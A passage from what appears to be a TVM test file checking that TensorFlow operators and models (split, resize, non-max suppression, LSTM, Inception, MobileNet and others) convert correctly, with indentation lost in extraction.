_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
"""One iteration of resize bilinear"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
"""One iteration of resize nearest neighbor"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
"""One iteration of resize nearest neighbor for graph with dynamic input shape"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
"""Resize Bilinear, Nearest_Neighbor"""
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
"""One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
"""Resize Bilinear"""
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
"""One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
"""One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
"""Resize Bilinear"""
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
"""Resize Bilinear"""
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
"""Crop to bounding box"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
"""Crop to bounding box"""
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
"""CropAndResize"""
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
"""NonMaxSuppressionV3,5"""
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
"""CombinedNonMaxSuppression"""
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
"""One iteration of a LSTM cell"""
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
"""One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
"""Pad"""
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
"""Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
